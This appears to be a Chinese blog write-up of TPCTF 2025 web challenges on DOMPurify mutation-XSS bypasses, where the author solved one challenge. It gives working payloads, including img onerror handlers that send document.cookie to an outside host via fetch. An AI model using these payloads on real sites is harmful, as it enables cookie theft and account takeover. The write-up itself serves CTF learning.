TPCTF-2025 web 复现

OneZ3r0 Lv3
  2025-03-08 21:49:56 2025-03-08 21:49:56 创建   2025-07-29 18:03:58 2025-07-29 18:03:58 更新      

前言

TPCTF,没想到能出一道题,也算是能给战队贡献自己的一点微薄之力了,虽然做出的题目不难

DOMpurify mXSS 系列

baby layout

1
2
3
<textarea>{{content}}</textarea>

<a id="</textarea><img src=x onerror=fetch('http://.../flag?'+document.cookie)>">onez3r0</a>

会被解析成如下

1
2
3
<textarea><a id="</textarea>
    <img src=x onerror=fetch('http://.../flag?'+document.cookie)>
">onez3r0</a></textarea>
image-20250308215206240
image-20250308215206240

safe layout

啊啊啊!人生中第一次在大比赛中做出题目来,我太激动了🥹
虽然解题不是很难,也是借着学长第一题的力,但是搜半天文章最后找到poc的感觉真好

1
<a aria-c="</textarea><img src=x onerror=fetch('http://.../flag?'+document.cookie)>">onez3r0</a>
image-20250309103827807
image-20250309103827807
image-20250309104610544
image-20250309104610544

safe layout revenge

没想到还是那篇文章里面的,唉,当时看了一半解完题之后太激动了也没耐心往下看完,不过好在学长发现了

1
x<style><\uFEFF/style><\uFEFFimg src=x onerror=alert(1)></style>
1
2
3
replace \uFEFF to {{content}}

then submit null

[参考文章] Exploring the DOMPurify library: Hunting for Misconfigurations (2/2)

  • 标题: TPCTF-2025 web 复现
  • 作者: OneZ3r0
  • 创建于 : 2025-03-08 21:49:56
  • 更新于 : 2025-07-29 18:03:58
  • 链接: https://blog.onez3r0.top/2025/03/08/tpctf-2025-reproduction/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
目录
TPCTF-2025 web 复现
  1. 前言
  2. DOMpurify mXSS 系列